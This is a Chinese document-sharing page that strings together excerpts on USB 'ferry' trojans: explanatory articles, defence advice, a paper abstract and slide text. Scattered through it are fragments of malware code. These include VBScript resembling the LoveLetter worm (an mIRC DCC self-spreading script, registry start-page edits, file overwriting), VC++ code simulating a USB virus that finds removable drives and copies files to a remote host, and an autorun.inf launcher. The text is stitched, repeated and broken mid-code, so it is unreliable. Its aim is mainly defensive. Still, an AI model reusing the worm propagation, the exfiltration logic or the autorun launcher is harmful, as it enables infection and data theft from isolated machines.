摆渡木马源码分析
- 格式:docx
- 大小:259.78 KB
- 文档页数:9
下载文档原格式
合集下载
“摆渡”木马工作原理及防范措施
“摆渡”木马工作原理及防范措施“摆渡”木马是一种利用网络攻击手段,通过对目标计算机进行渗透并植入木马程序,从而在目标计算机上建立起与攻击者之间的远程控制通道,实现对目标计算机的控制和操作。
其工作原理主要包括渗透入侵、植入木马和远程控制三个步骤。
首先,攻击者使用各种手段尝试渗透目标计算机的防御系统,包括网络扫描、漏洞利用、社会工程学等。
一旦找到目标计算机的漏洞,攻击者即可在目标计算机上获得权限,打开一扇后门用于进一步的攻击。
其次,攻击者在目标计算机上植入一个木马程序,这通常是一个具有远控功能的恶意软件。
木马程序被设计成伪装成合法程序或隐藏在其他正常程序中,可以很好地绕过防火墙和杀毒软件的检测。
一旦木马程序被运行,它会在计算机上建立起一个与攻击者控制端相连接的通道,将目标计算机上的信息传输给攻击者。
最后,攻击者通过远程控制端对目标计算机进行操作。
他们可以执行各种操作,例如远程查看目标计算机的屏幕、访问文件系统、操纵键盘和鼠标等。
此外,攻击者还可以利用木马程序进行更进一步的攻击活动,例如传播病毒、进行黑客攻击或窃取敏感信息等。
针对“摆渡”木马的防范措施主要包括以下几点:2.及时更新系统和软件:及时安装官方发布的系统和软件更新补丁,以修复已知漏洞,减少攻击窗口。
3.使用防病毒软件和防火墙:选择可信赖的防病毒软件和防火墙,并保持其及时更新和自动定期扫描功能开启。
4.网络流量监测和入侵检测系统:使用网络流量监测和入侵检测系统,对网络流量进行实时监控和异常检测,及时发现并应对潜在的攻击行为。
5.限制权限和访问控制:为用户和进程分配最小化的权限和访问范围,合理配置用户账号和密码策略,避免恶意软件利用高权限访问系统。
6.加密通信和身份验证:使用加密通信协议(如HTTPS)保护敏感数据传输,采用双因素身份验证方式来增加账号登录的安全性。
7.定期备份数据:定期备份重要数据,以防止部分数据因为木马攻击被损坏或被加密而无法使用。
木马分析
5.5木马技术5.5.1 木马技术概述木马的全称是“特洛伊木马”(Trojan horse),来源于希腊神话。
古希腊围攻特洛伊城多年无法攻下,于是有人献出木马计策,让士兵藏匿于巨大的木马中,然后佯作退兵,城中得知解围的消息后,将“木马”作为战利品拖入城内,匿于木马中的将士出来开启城门,与城外部队里应外合攻下特洛伊城,后世称这只大木马为“特洛伊木马”。
网络世界的特洛伊木马是指隐藏在正常程序中的一段具有特殊功能的恶意代码,是具备破坏和删除文件、发送密码、记录键盘和DoS攻击等特殊功能的后门程序。
它与控制主机之间建立起连接,使得控制者能够通过网络控制受害系统,通信遵照TCP/IP协议,最大的特征在于隐秘性,偷偷混入对方的主机里面,但是却没有被对方发现。
就象一个潜入敌方的间谍,为其他人的攻击打开后门,这与战争中的木马战术十分相似,因而得名木马程序。
实际上计算机网络木马不但可以窃取、破坏被植入主机的信息,而且可以通过控制主机来攻击网络中的其它主机。
木马程序不仅可能侵害到个人乃至某些公司的利益和权力,更可能危及整个社会和国家的利益和安全。
如果公安部用于采集处理人们身份证信息的计算机被安装了木马,那么这些信息就可能被木马以有线或无线的方式通过网络泄露出去,后果不堪设想。
木马是受控的,它能分清敌我,所以与分不清敌我的其它病毒和攻击技术相比,具有更大的危险性和破坏性。
木马是近几年比较流行的危害程度较严重的恶意软件,常被用作网络系统入侵的重要工具和手段。
2008年金山病毒报告监测显示,木马攻击占当前网络病毒的70%以上,已经成为当前网络危害最严重的网络病毒。
网络上各种“种马”技术加剧了木马的流行和发展,由于木马控制了被植入者的计算机,它几乎可以在被植入主机上为所欲为,破坏程度非常巨大,可以窃取账号密码、删除文件、格式化磁盘,甚至可以打开摄像头进行偷窥等;木马往往又被用做后门,植入被攻击的系统,以便为入侵者再次访问系统提供方便;或者利用被入侵的系统,通过欺骗合法用户的某种方式暗中“散发”木马,以便进一步扩大入侵成果和入侵范围,为进行其它入侵活动,如分布式拒绝服务攻击(DDoS)等提供可能。
木马分析报告
木马分析报告1. 引言木马(Trojan),又称为“特洛伊木马”,是指通过伪装成正常合法程序或文件进入目标系统,并在未被用户察觉的情况下,对系统进行非法操作的恶意软件。
木马程序的存在给系统安全带来了重大威胁,因此,对木马进行深入分析和研究十分必要。
本文将对一款木马进行分析,并对其传播方式、特征和危害进行探讨。
2. 木马的传播方式木马程序主要通过以下几种方式进行传播: 1. 邮件附件:木马程序常常伪装成诱人的附件,通过邮件发送给用户,一旦用户点击或下载附件,木马程序就会悄悄安装和运行。
2. 网络下载:用户在未经过恶意网站的仔细筛选的情况下,下载了含有木马的软件或文件,木马程序就会被安装到用户的系统中。
3. 可移动存储介质:如U盘、移动硬盘等存储介质中含有木马程序,只要用户将这些介质连接到自己的电脑上,木马程序就会被植入系统。
4. 动态链接库:木马程序可能会以DLL(Dynamic-Link Library)的形式出现,通过注入到正常进程中,实现对系统的控制。
3. 木马的特征为了能够更好地进行木马防护,我们需要了解木马的一些特征: 1. 欺骗性:木马程序通常伪装成合法可信的程序或文件,例如常见的.exe、.doc、.pdf等,以迷惑用户进行安装或下载。
2. 启动项修改:木马程序常常会修改系统的启动项,以保证自己能够在系统启动时自动运行,从而实现长期隐藏控制。
3. 远程控制:木马程序通常与远程服务器建立连接,以便黑客能够远程控制被感染的系统,进行各种操控、监控和窃取敏感信息等操作。
4. 系统资源占用增加:木马程序运行时会消耗大量系统资源,例如CPU和内存,从而降低系统的整体性能。
5. 网络流量增加:木马程序会通过网络上传、下载数据,导致网络流量明显增加,对网速造成影响。
4. 木马的危害与预防木马程序给系统带来的危害非常严重,包括但不限于以下几个方面: 1. 数据窃取:木马程序可以利用系统权限,窃取用户的个人隐私数据,例如登录名、密码、银行账号等。
木马的源代码
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt
}"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\\LOVE-LETTER-FOR-YOU.HTM"
Explorer\\Main\\Start
Page"," "
elseif num = 3 then
regcreate "HKCU\\Software\\Microsoft\\Internet
Explorer\\Main\\Start
Page"," "
elseif num = 4 then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt
}"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\\LOVE-LETTER-FOR-YOU.HTM"
Explorer\\Main\\Start
Page"," "
elseif num = 3 then
regcreate "HKCU\\Software\\Microsoft\\Internet
Explorer\\Main\\Start
Page"," "
elseif num = 4 then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or
VC编程模拟“摆渡”型U盘病毒
{
strcpy(FindedDir,pRoad);//pRoad是指定的文件夹
strcat(FindedDir,"\\");
strcat(FindedDir,findData.cFileName);//FindedDir是指定文件夹下的子文件夹
AddList(FindedDir);//加入文件夹列表
(摆渡型U盘病毒原理图)
本程序通过VC编程来模拟病毒的上述描述。
该程序分为三个步骤:
第一步,将资料拷贝到U盘中(A机中完成);
第二步,将U盘中(从A机拷贝到)的资料通过网络拷贝到指定的机器C中(B机中完成);
{
if (GetDriveType(szDriverName) == DRIVE_REMOVABLE)//搜索盘符,获得磁盘类型是DRIVE_REM OVABLE,即U盘
{
USB = szDriverName[0];
return true;
}
}
以上语句的含义就是从盘符A搜索到盘符Z,当GetDriveType函数返回值为DRIVE_REMOVABLE的时候,则说明其盘符为U盘盘符。
}
将U盘中的资料传到指定主机
该步骤是在B机中完成的,当听一U盘又在另一台接入网络的B机上使用时,使用CopyFile函数将U盘根目录下的11文件夹中的文件通过网络传给指定的主机C,并且使用一个判断语句,当上传成功后,则删除其在U盘中的源文件,达到隐藏的目的,代码如下:
char RemotePath[MAX_PATH];
do
{
strcpy(FindedFile,&USB);
strcat(FindedFile,"[url=file://\\11]\\11[/url]");
strcpy(FindedDir,pRoad);//pRoad是指定的文件夹
strcat(FindedDir,"\\");
strcat(FindedDir,findData.cFileName);//FindedDir是指定文件夹下的子文件夹
AddList(FindedDir);//加入文件夹列表
(摆渡型U盘病毒原理图)
本程序通过VC编程来模拟病毒的上述描述。
该程序分为三个步骤:
第一步,将资料拷贝到U盘中(A机中完成);
第二步,将U盘中(从A机拷贝到)的资料通过网络拷贝到指定的机器C中(B机中完成);
{
if (GetDriveType(szDriverName) == DRIVE_REMOVABLE)//搜索盘符,获得磁盘类型是DRIVE_REM OVABLE,即U盘
{
USB = szDriverName[0];
return true;
}
}
以上语句的含义就是从盘符A搜索到盘符Z,当GetDriveType函数返回值为DRIVE_REMOVABLE的时候,则说明其盘符为U盘盘符。
}
将U盘中的资料传到指定主机
该步骤是在B机中完成的,当听一U盘又在另一台接入网络的B机上使用时,使用CopyFile函数将U盘根目录下的11文件夹中的文件通过网络传给指定的主机C,并且使用一个判断语句,当上传成功后,则删除其在U盘中的源文件,达到隐藏的目的,代码如下:
char RemotePath[MAX_PATH];
do
{
strcpy(FindedFile,&USB);
strcat(FindedFile,"[url=file://\\11]\\11[/url]");
“摆渡”木马工作原理及防范措施
“摆渡”木马的工作原 理
文件感染
文件感染
摆渡木马可以通过感染可执行文件(如.exe、.dll等)来进行传播。一旦用户运行了被感染的文件,该文件就会将木马代码注入到用户的计算机系统中。
伪装欺骗
摆渡木马常常会伪装成正常的文件或软件,以欺骗用户点击或下载。例如,攻击者可能会在邮件附件中捆绑被感染的文件,或者在下载链接中提供被感染的软 件版本。
用户应时刻保持警惕,不轻易打开来自 未知来源的电子邮件、附件或下载的文 件。这些文件可能包含“摆渡”木马等 恶意软件。
用户应定期更新操作系统和应用程序,以确 保计算机具有最新的安全补丁和防护措施。 这有助于减少恶意软件利用漏洞进行攻击的 机会。
用户应使用可靠的安全软件,如杀 毒软件和防火墙,以监测和阻止恶 意软件的入侵。这些软件能够检测 和清除“摆渡”木马等恶意程序。
“摆渡”木马会隐藏在受害者的电脑中,并等待 攻击者的进一步指令。
“摆渡”木马能够逃避安全软件的检测和防御, 使得受害者的电脑长期处于危险状态,甚至可以 影响整个校园网的安全。
THANK YOU
恶意网站
攻击者可能会创建包含摆渡木马的恶意网站,当用户访问这些网站时,木马就会自动下载 并感染用户的计算机系统。此外,这些恶意网站还可能包含其他恶意软件或病毒,攻击者 可以通过多种方式来窃取用户的个人信息或控制用户的计算机系统。
漏洞利用
网络传播的摆渡木马还可以利用网络服务或应用程序的漏洞来进行传播。攻击者可以通过 扫描目标主机或服务器的漏洞,并将木马代码插入到目标系统中,以获得对目标系统的控 制权。
03
“摆渡”木马的防范措 施
定期更新系统补丁
及时更新系统补丁
定期检查并更新操作系统、浏览器和其他应用程序的补丁,以确保 系统的安全漏洞得到及时修复。
文件感染
文件感染
摆渡木马可以通过感染可执行文件(如.exe、.dll等)来进行传播。一旦用户运行了被感染的文件,该文件就会将木马代码注入到用户的计算机系统中。
伪装欺骗
摆渡木马常常会伪装成正常的文件或软件,以欺骗用户点击或下载。例如,攻击者可能会在邮件附件中捆绑被感染的文件,或者在下载链接中提供被感染的软 件版本。
用户应时刻保持警惕,不轻易打开来自 未知来源的电子邮件、附件或下载的文 件。这些文件可能包含“摆渡”木马等 恶意软件。
用户应定期更新操作系统和应用程序,以确 保计算机具有最新的安全补丁和防护措施。 这有助于减少恶意软件利用漏洞进行攻击的 机会。
用户应使用可靠的安全软件,如杀 毒软件和防火墙,以监测和阻止恶 意软件的入侵。这些软件能够检测 和清除“摆渡”木马等恶意程序。
“摆渡”木马会隐藏在受害者的电脑中,并等待 攻击者的进一步指令。
“摆渡”木马能够逃避安全软件的检测和防御, 使得受害者的电脑长期处于危险状态,甚至可以 影响整个校园网的安全。
THANK YOU
恶意网站
攻击者可能会创建包含摆渡木马的恶意网站,当用户访问这些网站时,木马就会自动下载 并感染用户的计算机系统。此外,这些恶意网站还可能包含其他恶意软件或病毒,攻击者 可以通过多种方式来窃取用户的个人信息或控制用户的计算机系统。
漏洞利用
网络传播的摆渡木马还可以利用网络服务或应用程序的漏洞来进行传播。攻击者可以通过 扫描目标主机或服务器的漏洞,并将木马代码插入到目标系统中,以获得对目标系统的控 制权。
03
“摆渡”木马的防范措 施
定期更新系统补丁
及时更新系统补丁
定期检查并更新操作系统、浏览器和其他应用程序的补丁,以确保 系统的安全漏洞得到及时修复。
基于BLP模型的摆渡木马防御技术的研究
中图分类号 : T P 3 9 3 文献标识码 : A 文章编号 : 1 0 0 Байду номын сангаас — 3 0 4 4 ( 2 0 1 3 ) 2 2 — 5 0 5 8 — 0 3
R e s e a r c h o n t h e F e r r y T r o j a n Ho r s e De f e n s e T e c h n o l o g y B a s e d o n B L P Mo d e l Z HA O Y i — c h e n , NI U Z h e n g — q u n , MA C h u a n — l o n g , Y u S h e n g - j u n’
BLP mo de l i s pr o po s e d.I n t hi s s c he me ,a c c o r d i n g t o t he de g r e e of i m po r t a nc e o f ne t wo r k o r c o m pu t e r il f e s ,t h e i f l e s a r e d i v i d e d i n t o di fe r e nt l e ve l s ; t h e u s e r a c c e s s t o t h e le i f i s d i vi de d i n t o di fe r e nt l e ve l s o f t he c o r r e s p ond i ng ;whe n t h e us e r a c c e s s t o t he il f e , by c o m pa ing r t he a u t ho it r y r a nk a nd il f e l e ve l t o d e c i d e w he t he r t o r e a d or wr it e . Be c a us e t he mo bi l e s t o r a g e me di um l e ve l s e t t o a mi n i m um , S O t h e s c he me c a n e fe c t i ve l y pr e ve n t t he f e r r y h or s e .
木马程序开发技术:病毒源代码详解
⽊马程序开发技术:病毒源代码详解近年来,⿊客技术不断成熟起来,对⽹络安全造成了极⼤的威胁,⿊客的主要攻击⼿段之⼀,就是使⽤⽊马技术,渗透到对⽅的主机系统⾥,从⽽实现对远程操作⽬标主机。
其破坏⼒之⼤,是绝不容忽视的,⿊客到底是如何制造了这种种具有破坏⼒的⽊马程序呢,下⾯我对⽊马进⾏源代码级的详细的分析,让我们对⽊马的开发技术做⼀次彻底的透视,从了解⽊马技术开始,更加安全的管理好⾃⼰的计算机。
1、⽊马程序的分类 ⽊马程序技术发展⾄今,已经经历了4代,第⼀代,即是简单的密码窃取,发送等,没有什么特别之处。
第⼆代⽊马,在技术上有了很⼤的进步,冰河可以说为是国内⽊马的典型代表之⼀。
第三代⽊马在数据传递技术上,⼜做了不⼩的改进,出现了ICMP等类型的⽊马,利⽤畸形报⽂传递数据,增加了查杀的难度。
第四代⽊马在进程隐藏⽅⾯,做了⼤的改动,采⽤了内核插⼊式的嵌⼊⽅式,利⽤远程插⼊线程技术,嵌⼊DLL线程。
或者挂接PSAPI,实现⽊马程序的隐藏,甚⾄在Windows NT/2000下,都达到了良好的隐藏效果。
相信,第五代⽊马很快也会被编制出来。
关于更详细的说明,可以参考ShotGun的⽂章《揭开⽊马的神秘⾯纱》。
2.⽊马程序的隐藏技术 ⽊马程序的服务器端,为了避免被发现,多数都要进⾏隐藏处理,下⾯让我们来看看⽊马是如何实现隐藏的。
说到隐藏,⾸先得先了解三个相关的概念:进程,线程和服务。
我简单的解释⼀下。
进程:⼀个正常的Windows应⽤程序,在运⾏之后,都会在系统之中产⽣⼀个进程,同时,每个进程,分别对应了⼀个不同的PID(Progress ID, 进程标识符)这个进程会被系统分配⼀个虚拟的内存空间地址段,⼀切相关的程序操作,都会在这个虚拟的空间中进⾏。
线程:⼀个进程,可以存在⼀个或多个线程,线程之间同步执⾏多种操作,⼀般地,线程之间是相互独⽴的,当⼀个线程发⽣错误的时候,并不⼀定会导致整个进程的崩溃。
浅析校园网络安全技术
姆关注.
|
蚤 垒
更新 的方 式为 将摆 渡 木 马的 同 心端 口、代码 存 放位 置 以及 木 马 的加 载 启 动方 式 ,并 且将 木 马 文件 中的字 符 串进 行 记 录 ,将 木 马 的恶意 操作 行为 同样 记录 在静 态特 征库 中 。 3 结束 语 本 文 先 介 绍 了 网 络 技 术 发 展 过程 中 ,网 络 安 全 问题
作 者单 位 :重 庆 广播 电视 集 团 ( 总 台 ),重庆 4 0 0 0 3 9
《 《 《 《 《 《 上接 第1 6 3 页 接 收方 则 将 此密 文 经 过解 密 函数 、解密 钥 匙 还原 成 明文 。 加 密技 术 是 网络 安 全 技术 的 基石 。在校 园 内,各 种 科研 成 果 、 论文 、教案 、教材 、成 绩 、各 类 资料 等 都是 非 常重 要
的重 要性 ,分 析 了 内部 网络 与外 部 网络 摆 渡文 件 时容 易 遭 受 网络 攻击 的原 因和 摆渡 式 木 马攻 击 的基 本 原理 ,最 后 给
讯 以及 操作 的条件 ,使 木马失 去攻击和 侵害 系统的作用 。 对摆 渡 木 马 的查 杀 需要 遵循 一 定 的过 程进 行 的 , 否则 无 法将木 马进 行全部 的清 除。对于 正在运 行的摆渡 木马 ,首 先的任 务是终 止木 马的运行 ,并且 对木 马的进程进 行删 除 。
[ 6 】 王敏 慧 , 樊艳芬 . 浅析 计 算机 网络 遭 受攻 击的 主要途 径及 其 防御 措施 [ J ] . 福 建 电脑, 2 0 1 3 ( 0 4 ) : 5 6 - 5 9 . [ 7 ] 江建慧, 章力源, 金涛. 基于k 循环随机序 列的摆渡病毒文件防御 [ J ] . 同济大学学报 ( 自然科学版) , 2 0 1 2 ( 0 6 ) : 1 0 - 1 0 5 . 作 者 简介 :解 兴群 ( 1 9 7 1 . 0 7 - ),女 ,重 庆人 ,工程 师 ,研 究 方 向:媒 资 系统信 息技 术 。
|
蚤 垒
更新 的方 式为 将摆 渡 木 马的 同 心端 口、代码 存 放位 置 以及 木 马 的加 载 启 动方 式 ,并 且将 木 马 文件 中的字 符 串进 行 记 录 ,将 木 马 的恶意 操作 行为 同样 记录 在静 态特 征库 中 。 3 结束 语 本 文 先 介 绍 了 网 络 技 术 发 展 过程 中 ,网 络 安 全 问题
作 者单 位 :重 庆 广播 电视 集 团 ( 总 台 ),重庆 4 0 0 0 3 9
《 《 《 《 《 《 上接 第1 6 3 页 接 收方 则 将 此密 文 经 过解 密 函数 、解密 钥 匙 还原 成 明文 。 加 密技 术 是 网络 安 全 技术 的 基石 。在校 园 内,各 种 科研 成 果 、 论文 、教案 、教材 、成 绩 、各 类 资料 等 都是 非 常重 要
的重 要性 ,分 析 了 内部 网络 与外 部 网络 摆 渡文 件 时容 易 遭 受 网络 攻击 的原 因和 摆渡 式 木 马攻 击 的基 本 原理 ,最 后 给
讯 以及 操作 的条件 ,使 木马失 去攻击和 侵害 系统的作用 。 对摆 渡 木 马 的查 杀 需要 遵循 一 定 的过 程进 行 的 , 否则 无 法将木 马进 行全部 的清 除。对于 正在运 行的摆渡 木马 ,首 先的任 务是终 止木 马的运行 ,并且 对木 马的进程进 行删 除 。
[ 6 】 王敏 慧 , 樊艳芬 . 浅析 计 算机 网络 遭 受攻 击的 主要途 径及 其 防御 措施 [ J ] . 福 建 电脑, 2 0 1 3 ( 0 4 ) : 5 6 - 5 9 . [ 7 ] 江建慧, 章力源, 金涛. 基于k 循环随机序 列的摆渡病毒文件防御 [ J ] . 同济大学学报 ( 自然科学版) , 2 0 1 2 ( 0 6 ) : 1 0 - 1 0 5 . 作 者 简介 :解 兴群 ( 1 9 7 1 . 0 7 - ),女 ,重 庆人 ,工程 师 ,研 究 方 向:媒 资 系统信 息技 术 。
“摆渡”木马工作原理及防范措施
传播途径更加广泛
随着网络攻击技术的不断发展,摆渡 木马的传播途径也将更加广泛,攻击 者可以通过各种途径,如社交媒体、 电子邮件、恶意网站等,散播摆渡木 马,以增加攻击的范围和效果。
“摆渡”木马的未来展望
防御技术不断提升
随着网络安全技术的不断发展,防御摆渡木马的手段也 将不断提升,安全软件将更加具有检测和防范摆渡木马 的能力,攻击者将面临更大的挑战。
一旦被触发,摆渡木马 会通过网络与控制端建 立连接,并接收来自控 制端的命令。
控制端可以通过摆渡木 马将恶意文件传输到被 感染主机上,或者从被 感染主机上窃取敏感信 息。
摆渡木马会执行来自控 制端的命令,如记录键 盘输入、窃取用户密码 等。
摆渡木马会将执行结果 反馈给控制端,以便攻 击者掌握攻击进展和效 果。
强大的破坏性
广泛传播性
摆渡木马可以破坏系统的稳定性和安全性, 导致数据丢失、隐私泄露、计算机系统崩溃 等严重后果。
摆渡木马可以通过网络、移动存储设备等多 种途径传播,造成大规模的感染和破坏。
“摆渡”木马的历史与发展
“摆渡”木马是一种较为古老的恶意软件,早在20世纪末 就已出现。最初它主要通过邮件和网络下载传播,用于攻 击个人计算机系统。
随着网络技术的发展和普及,摆渡木马逐渐发展成为一种 大规模的网络攻击工具。攻击者可以利用它控制受害者的 计算机系统,进行窃取、篡改、删除等恶意操作,甚至可 以用来制造僵尸网络、发动DDoS攻击等。
02
“摆渡”木马的工作原理
“摆渡”木马的传播方式
01
伪装成正常软件
02
网络钓鱼
摆渡木马通常会伪装成正常软件,如 文本编辑器、媒体播放器等,通过社 交工程手段诱骗用户下载安装。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
1.产生背景
随着部队办公自动化信息化的发展,越来越多的资料从以前的书面文字变为电子档案存放在计算机当中。
在带来办公效率提高的同时,也给不法分子窃取我军机密资料带来了新的方法。
黑客攻击、泄密事件层出不穷。
针对这种情况目前我军计算机网络和民用计算机网络虽然是采用相同的技术,但是为保障军网的安全,防止互联网上各种攻击对军网造成危害,一般采用物理隔离的措施,即军用计算机信息系统不直接或间接地与国际互联网或者其他公共信息网络相连接。
实施物理隔离可以最大限度地阻止来自于互联网的直接攻击。
但物理隔离并不能彻底解决军网的安全问题。
物理隔离的军网面临的威胁主要有内部攻击、“摆渡”攻击、非法外联和非法接入等。
这其中以“摆渡”攻击最为严重,且难于防范。
这种方式甚至可以间接入侵既不接入互联网,也不接入军网的这种完全与网络隔离的保存涉密资料较多的计算机。
2.什么是摆渡木马
现在许多单位为了防止木马病毒的感染,将存放单位机密文件、涉密资料等重要信息的计算机与互联网实行物理隔离,不联网使用。
使得传统的木马病毒即使感染计算机,也无法对计算机进行控制和窃取计算机的信息。
针对这种情况,木马开发者设计出以移动存储设备为媒介,在电脑间进行传播的“摆渡渡木马”。
这种木马通过U 盘等移动存储设备感染没有联网的计算机,然后搜索计算机的敏感信息(帐号、密码、涉密信息),再存储到优盘,进而传到联网的计算机上,再送给窃取者。
3.摆渡木马的传播途径
下图是木马传播的一个路径图:
图中 0,1,2,3 是木马传播的路径,其中第 0 条路径显然没有办法可以防御;第1条路径由于其中的其他上网机很难控制,也不适合部署防御;因此,只能从第2,3,条路径部署防御。
4.攻击原理
“摆渡”攻击是利用木马与移动存储介质对隔离网络进行的攻击。
应用最新的攻击技术,攻击者首先攻击控制连接到互联网的计算机,当发现移动存储介质接入时,就会将“摆渡”木马植入其中。
该移动存储介质一旦在军网使用就会激活“摆渡”木马,自动收集内网计算机上的涉密文档等信息,可以进一步向内网渗透,将收集到的信息加密隐藏在移动存储介质上。
当该移动存储介质再次在接入互联网的计算机上使用时,木马就会自动把收集的秘密文件交给攻击者。
木马的启动实际上是利用了U盘根目录下的autorun.inf文件,这个文件在U盘广泛使用之前一般是出现在光盘中,用于计算机插入光盘后的自动启动。
比如:
[AUTORUN]
OPEN=X.exe
ICON=X.exe
很多用户没有关闭计算机操作系统的“自动播放功能”,这一点很容易被木马所利用。
黑客将木马程序伪装成autorun.inf文件植入你的U盘当中,当你的U盘在涉密机器上使用的时候就自动执行了木马程序,将资料复制到U盘中并隐藏起来,当U盘再
次在上网机器上使用的时候就将资料通过网络发送出去,从而不知不觉得将涉密文件从没有任何网络连接的机器上窃走。
由于autorun.inf文件不仅存在于U盘上而且在硬盘的每个分区下都有一个autorun.inf文件。
带有木马的U盘一旦在某台计算机上使用不仅会窃走资料,而且会在这台计算机中替换掉计算机硬盘中的autorun.inf文件,从而使得该计算机也被植入木马,进而使此后在这台机器上使用的U盘都被植入木马,当这些被植入木马的U盘在其他计算机中使用的时候就会感染其他的计算机,“摆渡”攻击就是通过这种方式实现木马的扩散。
此外,随着病毒技术的不断发展,有些黑客将“摆渡”木马与计算机病毒捆绑到一起,使得“摆渡”木马具有了与计算机病毒相同的自动传播功能。
它使木马程序不仅通过U盘传播并且可以在接入军网的计算机中通过网络肆意传播,对军网内的计算机安全造成了巨大的威胁。
4.1 摆渡木马演示程序示例的过程
现有一个U盘未感染前,可利用空间的U盘内容如图所示:
U盘内的内容如图所示:
现有一台windows server2003,中木马前的进程如图所示:
电脑运行木马程序后进程图如下:
对比两个进程图,可以发现进程数增加1个,多了一个Uvir.exe进程。
然后将感染的U盘插入另外一台windows XP 系统中,未插入前XP系统进程如图所示:
插入感染后的U盘后进程如图所示:
对比两个进程图,可以发现进程数也增加1个,多了一个Uvir.exe进程,重启系统后该进程随电脑开机启动。
4.2 摆渡木马源程序原理分析
5.防范措施
“摆渡”攻击实质上就是利用木马入侵计算机,因此防范措施必不可少的就是确保计算机都安装杀毒软件,并且要做到及时升级病毒库,按时查杀病毒。
为防止被植入木马的机器通过网络传播病毒,对于涉密程度较高的机器要禁止接入任何网络并防止非法外联。
非法外联的形式有两种:一是私自将计算机连接网络。
按照规定涉密程度高的计算机不能与网络相连,但有人为了便利,可能把计算机偷偷接入网络,这样就使得该计算机本来被强制隔绝的网路打开,外部攻击者很容易通过这条线路获取计算机的控制权,进而植入“摆渡”木马窃取秘密信息。
非法外联的第二种形式是将涉密计算机接入互联网。
有些同志在办公时将便携式计算机接入军队计算机网络处
理涉密信息,回家后又将便携式计算机接入互联网,查阅资料、处理电子邮件。
从表面上看,只要接入互联网前把机器上的涉密信息清除掉,这种行为的危害不大。
然而,计算机一旦接入互联网就有可能遭受攻击。
如果攻击者入侵并控制计算机,就可以利用磁盘恢复技术将清除的涉密信息还原出来。
同时,入侵者还可以通过对机器上信息的分析,判断出该主机是否曾接入军网,并在其中植入“摆渡”木马。
计算机回到军网后,木马就会自动在军网内部传播并且窃取机密资料加密存储起来,等到计算机再次上互联网时,主动把收集的信息加密发送到事先指定的邮箱等地,达到窃取军事秘密的目的。
以上都是对计算机安全提出的要求。
我们都知道“摆渡”攻击利用主要是移动存储介质即U盘。
因此,防止“摆渡”攻击的最根本的方法是加强对存储介质的分类管理:涉密介质应该有专人管理,秘密信息在移动介质中要加密存储;禁止用非涉密存储介质来存储和处理涉密信息。
禁止在接入互联网的计算机上使用保存过涉密资料的存储介质,无论是否存放涉密资料禁止接入过互联网的存储介质在接入军网的计算机上使用,如果一定要从互联网向接入军网的计算机传送资料,必须使用刻录光盘的方法传送。
但是在前文中曾经介绍过,“摆渡”攻击所利用的autorun.inf文件最早就是使用在光盘的自动启动上,据资料介绍,利用可刻录光盘进行“摆渡”攻击的例子目前虽然还不多见,但是在技术上是完全可行的,因此利用可刻录光盘进行“摆渡”攻击,只是时间上的问题。
除了采用上述技术措施之外,还要加强网络的安全管理,制定有关规章制度。
网络的安全管理策略包括:制定有关网络操作使用规程;制定网络系统的维护制度和应急措施;严格遵守军人使用互联网的规定;严格遵守军人使用移动存储介质的规定等。